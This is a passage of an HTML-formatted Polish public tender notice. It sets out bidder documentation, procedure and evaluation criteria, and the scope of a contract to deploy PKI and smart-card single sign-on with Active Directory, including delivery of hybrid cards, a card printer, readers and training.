legalnego, autoryzowanego kanału sprzedaży producenta i nie posiada wad prawnych,c) potwierdzające, że zaproponowany sprzęt będzie fabrycznie nowy oraz przeznaczony dla użytkowników z obszaru Rzeczypospolitej Polskiej,d) potwierdzające datę produkcji sprzętu, która nie może być wcześniejsza niż w 2019 r. od daty dostarczenia sprzętu, dotyczy Części I - wg wzoru stanowiącego Załącznik nr 9;Opis techniczny wraz z planowaną architekturą oprogramowania, zaoferowanych kart procesorowych, sprzętu, przeinstalowanych pakietów i apletów (wraz z nazwą producenta i typem modelu) w celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego – w języku polskim, dotyczy Części I;Specyfikację techniczną oferowanego sprzętu oraz oprogramowania wraz ze wskazaniem producenta, nazw i typu sprzętu używanych w obrocie handlowym – wg wzoru stanowiącego Załącznik nr 5 dla Części III; Oświadczenie Wykonawcy, że jest autoryzowanym przedstawicielem producenta systemu kopii zapasowych wymaganym przez Zamawiającego w Opisie przedmiotu zamówienia – wg wzoru stanowiącego Załącznik nr 8 dla Części II;</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Oświadczenie Wykonawcy:a) o warunkach gwarancji, Wykonawca będzie pośredniczył w zakresie realizacji gwarancji producenta sprzętu,b) potwierdzające, że dostarczone urządzenia i oprogramowanie jest legalne, pochodzi z legalnego, autoryzowanego kanału sprzedaży producenta i nie posiada wad prawnych,c) potwierdzające, że zaproponowany sprzęt będzie fabrycznie nowy oraz przeznaczony dla użytkowników z obszaru Rzeczypospolitej Polskiej,d) potwierdzające datę produkcji sprzętu, która nie może być wcześniejsza niż w 2019 r. od daty dostarczenia sprzętu, dotyczy Części I - wg wzoru stanowiącego Załącznik nr 9;Opis techniczny wraz z planowaną architekturą oprogramowania, zaoferowanych kart procesorowych, sprzętu, przeinstalowanych pakietów i apletów (wraz z nazwą producenta i typem modelu) w celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego – w języku polskim, dotyczy Części I;Specyfikację techniczną oferowanego sprzętu oraz oprogramowania wraz ze wskazaniem producenta, nazw i typu sprzętu używanych w obrocie handlowym – wg wzoru stanowiącego Załącznik nr 5 dla Części III; Oświadczenie Wykonawcy, że jest autoryzowanym przedstawicielem producenta systemu kopii zapasowych wymaganym przez Zamawiającego w Opisie przedmiotu zamówienia – wg wzoru stanowiącego Załącznik nr 8 dla Części II;</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin wdrożenia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin dostawy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-11-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zakup i wdrożenie mechanizmów infrastruktury klucza publicznego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wdrożenie i konfiguracja w infrastrukturze Zamawiającego systemu uwierzytelnienia kartami inteligentnymi oraz infrastruktury klucza publicznego wraz z dostarczeniem kart uniwersalnych, urządzeń do programowania, odczytu oraz oprogramowania umożliwiającego dostęp do zasobów wewnątrz organizacji, integracji z Active Directory oraz dostępu do systemu poczty elektronicznej zarówno poprzez klienta Outlook jak i też przez Exchange OWA przy wykorzystaniu przeglądarki wraz z wymaganym wyposażeniem dodatkowym do programowania oraz personalizacji kart inteligentnych.Obsługi bezpieczeństwa w budynku. W ramach zamówienia należy przeprowadzić szkolenia. Dostarczone karty powinny umożliwiać również wejście do budynku bez konieczności wymiany czytników na bramkach oraz systemy w zakresie użytkowania, obsługi oraz personalizacji wdrażanych hybrydowych kart inteligentnych wraz z przygotowaniem nowych procesów obsługi kart dla Zamawiającego. Na przedmiot zamówienia składają się:1.	Wdrożenie i konfiguracja oprogramowania do uwierzytelnienia (SSO) przy pomocy hybrydowych kart inteligentnych do zasobów Zamawiającegoa.	Zaprojektowanie zintegrowanej infrastruktury do uwierzytelnienia oraz autoryzacji oraz implementacja i wdrożenie infrastruktury klucza publicznego PKI zintegrowanego z infrastrukturą uwierzytelniającą Zamawiającego i umożliwiającą uwierzytelnienie oraz autoryzację użytkowników i urządzenia:	Określenie wymaganych komponentów środowiska do implementacji uwierzytelnienia przy pomocy certyfikatów w środowisku Zamawiającego;	Zaprojektowanie poszczególnych komponentów wymaganych w środowisku Zamawiającego do implementacji uwierzytelnienia (SSO) przy pomocy kart inteligentnych;	Zaprojektowanie i implementacja konfiguracji Active Directory oraz polityk GPO;	Aktualizacja kontrolerów domeny Active Directory Domain Services do wymaganego poziomu;	Podniesienie poziomu domeny i lasu Active Directory do wymaganego poziomu;	Aktualizacja zintegrowanych komponentów z Active Directory do wymaganego poziomu (Active Directory Federation Services, Active Directory Light Directory Services, Exchange Services, SharePoint Services, SQL Server i inne określone na etapie analizy);b.	Zaprojektowanie i wdrożenie infrastruktury klucza prywatnego w organizacji Zamawiającego:	Zaprojektowanie standardów nazewniczych dla PKI;	Zaprojektowanie wielopoziomowego oraz bezpiecznego PKI;	Instalacja oraz konfiguracja serwerów PKI zgodnie z zaprojektowanym standardem;	Konfiguracja oraz wdrożenie punktów dystrybucji oraz konfiguracji PKI;	Konfiguracja oraz wdrożenie API dostępowych do infrastruktury PKI;	Konfiguracja szablonów i polityk startowych w GPO Active Directory;	Wdrożenie spójnych mechanizmów aktualizacji na serwerach i stacjach roboczych w organizacji Zamawiającego;c.	Konfiguracje i wdrożenie dedykowanych polityk w infrastrukturze Zamawiającego umożliwiających uwierzytelnienie, autoryzację oraz generowanie wymaganych certyfikatów w infrastrukturze klucza publicznego Zamawiającego:	Zaprojektowanie i wdrożenie wymaganych szablonów certyfikatów w infrastrukturze klucza publicznego Zamawiającego;	Implementacja i konfiguracja wymaganych polityk GPO w infrastrukturze Active Directory Zamawiającego;	Zaprojektowanie i wdrożenie dedykowanych skryptów (PowerShell, VBscript) wymaganych do konfiguracji stacji klienckich;d.	Przygotowanie i implementacja szablonów certyfikatów zgodnie z potrzebami Zamawiającego służących do uwierzytelnienia i autoryzacji użytkowników oraz urządzeń do serwerów, usług i aplikacji Zamawiającego:	Przygotowanie polityk automatycznej i ręcznej możliwości generowania i instalacji certyfikatów na stacjach roboczych w Active Directory;	Przygotowanie reguł odwoływania i odnawiania certyfikatów w PKI;	Opracowanie procesów generowania certyfikatów do podpisywania oraz uwierzytelnienia, które wymagają akceptacji;	Udostępnienie możliwości automatycznego generowania certyfikatów przez urządzenia i użytkowników zgodnie z wymaganiami;e.	Wdrożenie i konfiguracja oprogramowania umożliwiającego uwierzytelnienie (SSO) przy pomocy hybrydowych kart inteligentnych na podstawie wygenerowanych certyfikatów:	Dystrybucja bibliotek i oprogramowania na stacje użytkowników oraz wyspecyfikowane serwery;	Przygotowanie polityk i dystrybucji konfiguracji na stacje użytkowników;	Uruchomienie i monitoring uruchomionego oprogramowania oraz sterowników;	Konfiguracja SSO na stacjach użytkowników;f.	Przygotowanie środowisk testowych oraz przeprowadzenie testów systemowych, integracyjnych oraz akceptacyjnych dla wdrażanego rozwiązania:	Przygotowanie środowiska i testów infrastruktury PKI;	Przygotowanie i testy zintegrowanego środowiska AD i Exchange;	Przygotowanie i testy środowisk klienckich do obsługi kart inteligentnych;g.	Dostosowanie interfejsu użytkownika – aplikacja zainstalowana na komputerze powinna posiadać zgodność kolorystyczną i wizualną z wymaganiami Zamawiającego w zakresie identyfikacji wizualnej organizacji. Interfejs użytkownika musi być w języku polskim.2.	Dostawa 300 szt. kart procesorowych hybrydowych spełniających poniższe wymagania:a.	Elektroniczna karta procesorowa hybrydowa o pojemności pamięci nieulotnej typu EEPROM wynoszącej co najmniej 72 kilobajtów, z dwoma interfejsami:	stykowym:o	zgodność z ISO/IEC 7816-2 i 7816-3;o	polecenia i odpowiedzi przesyłane podczas komunikacji karty z infrastrukturą informatyczną powinny mieć strukturę zgodną z APDU określoną w normie ISO/IEC 7816-4;o	realizować zbiór poleceń APDU określony w normie ISO/IEC 7816-4;o	polecenia realizowane przez kartę dla operacji kryptograficznych i zarządzania są zgodne z normą ISO/IEC 7816-8, ISO/IEC 7816-9 oraz ISO/IEC 7816-15;o	pozostałe wymagania w punkcie ‘Układ procesorowy’	bezstykowym:o	Karta zaprogramowana unikalnym 64 bitowym 18-cyfrowym numerem, ID umieszczone na każdej karcieo	Karta tylko do odczytu, bez możliwości programowaniao	Częstotliwość pracy: 125 kHzo	Zgodna z ISO7816o	Zgodna ze standardowymi urządzeniami do otwierania drzwi i czytnikamio	Zgodna z systemami kontroli zamawiającego o	Bezstykowa transmisja danych, karta nie wymaga dodatkowego zasilaniab.	Karty wykonane z materiału laminowanego nieulegającemu odkształceniu i/lub rozwarstwieniu o wymiarach i właściwościach fizycznych zgodnych z wymaganiami określonymi dla kart identyfikacyjnych w normie ISO/IEC 7810. Karty nie mogą być wygięte, zniekształcone, porysowane oraz sklejone. Laminat po obydwu stronach karty płynnie przykrywa wszystkie zniekształcenia powierzchni – zwłaszcza w miejscu wprasowywania chipów.Układ procesorowy1.	System operacyjny, zapewniający wieloaplikacyjność, obsługujący interfejsy: stykowy i bezstykowy karty, umożliwiający wprowadzanie obiektów (aplikacji, plików) w bezpiecznym środowisku, zgodny ze standardem Global Platform Card Specification w wersji 2.3 lub wyższej.2.	Preinstalowane aplety:•	zarządzanie kartą (Card Manager);•	system plików ISO IEC 7816;•	funkcjonalność PKCS #11.3.	Karta jest przystosowana do umieszczenia na niej certyfikatu wraz z kluczami kryptograficznymi; certyfikaty mogą zostać umieszczone w późniejszym czasie. Liczba certyfikatów możliwych do umieszczenia na karcie ograniczona jest jedynie pojemnością karty.4.	Karta przygotowana do niezależnej i oddzielnej realizacji operacji:o	składania podpisu elektronicznego z wykorzystaniem umieszczonego na karcie certyfikatu (MS CSP, PKCS#11);o	sprzętowego zabezpieczenia komputera (za pomocą osobnej aplikacji): wyjęcie karty z czytnika – zablokowanie dostępu do komputera, włożenie karty do czytnika i podanie kodu PIN - odblokowanie dostępu do komputera.Dostęp do każdej z operacji wymienionych w powyższych punktach może być zabezpieczony oddzielnymi kodami PIN i PUK, blokada kodu PIN po trzykrotnym kolejnym błędnym podaniu tego kodu, blokada kodu PUK po pięciokrotnym kolejnym błędnym podaniu tego kodu. Każda partia kart jest dostarczana z unikalnymi kluczami transportowymi dla części bezstykowej (UNIQUE RFID 125 kHz RCP) i stykowej (dostęp do układu procesorowego).Zaoferowane Karty muszą być obsługiwane co najmniej w zakresie wydruku, kodowania, personalizacji i przedłużania okresu ważności.3.	Dostawa drukarki do personalizacji kart - 1 szt.Drukarka jednostronna, kolorowa drukarka do zadruku kart plastikowych z koderami kart stykowych i bezstykowych (dostawa w ciągu 14 dni od podpisania umowy).Drukarka powinna być wyposażona w dodatkowy komplet materiałów eksploatacyjnych umożliwiający wydruk wszystkich zamawianych kart. W celu uniknięcia wątpliwości materiały eksploatacyjne są to wszystkie produkty wymienione przez producenta do samodzielnego montażu przez użytkownika. Drukarka winna posiadać oprogramowanie służące samodzielnej personalizacji nadruku na zamawianych kartach. Instalacja oprogramowania powinna odbywać się za pomocą kreatora w środowisku Windows 10.Inne parametry minimalne Drukarki:•	Rodzaj nadruku: termosublimacja, termotransfer•	Typ nadruku: jednostronny, kolorowy, monochromatyczny•	Rozdzielczość druku: 300dpi•	Powierzchnia nadruku: Druk od krawędzi do krawędzi na standardowych nośnikach CR-80•	Podajnik / odbiornik kart: 90/90•	Czas wydruku jednostronnego monochromatycznego: 300 kart/h•	Czas wydruku jednostronnego kolorowego: 100 kart/h•	Wydajność folii drukujących: o	Druk kolorowy - 100 o	Druk monochromatyczny - 1000•	Grubość karty: do 30mil•	Komunikacja: USB, Ethernet 10/100•	Koder kart magnetycznych: Opcja•	Sterowniki: o	Windows 7 (64-bitowy)o	Windows 8 i Win 8 Pro (zgodność z wersją 64-bitową)o	Windows Server 2012/2016/2019 (64 bit)o	Windows 10 (32 bit i 64 bit)4.	Dostarczenie czytników stykowych do obsługi kart – 50 szt.:•	Interfejs USB: minimum USB typu A 2.0 Full Speed•	Długość przewodu: minimum 1 m•	Gniazdo kart stykowych:o	Wsparcie dla kart inteligentnych,o	Wsparcie dla kart pamięci•	Interfejs kart stykowych	o	Format karty- Standardowy (ID-1) - 85.60 mm x 53.98 mmo	Standard - ISO 7816 Parts 1-3, Class A, B, C (5 V, 3 V, 1.8 V)o	Protokoły - T=0; T=1; Memory Card Support CAC, PIV, SIPRNET, J-LIS Smart Cards•	Certyfikaty / Zgodnościo	EN 60950/IEC 60950, ISO 7816, EMV Level 1 (Contact), PC/SC, CCID, CE, FCC, RoHS 2, REACH, USB Full Speed, Microsoft® WHQL•	Obsługiwane systemy operacyjneo	Windows, Linux, Mac OS, Android™ od oficjalnie wspieranych wersjiWyżej wymienione elementy muszą być objęte gwarancją producenta wynoszącą min. 24 miesięcy.5.	Przeprowadzenie szkoleń:Omówienie zagadnień i szczegółowe zapoznanie z wiedzą teoretyczną administratorów w zakresie przeprowadzonego wdrożenia:•	Wdrożenie PKI w infrastrukturze Active Directory, funkcje i możliwości•	Instalowanie i konfiguracja aplikacji do obsługi PKI na komputerach lokalnych•	Zarządzanie urzędem certyfikacji i certyfikatami, administracja•	Jak integrować inne systemy z PKI•	Analiza logów aktywności 6.	Wytworzenie wymaganej 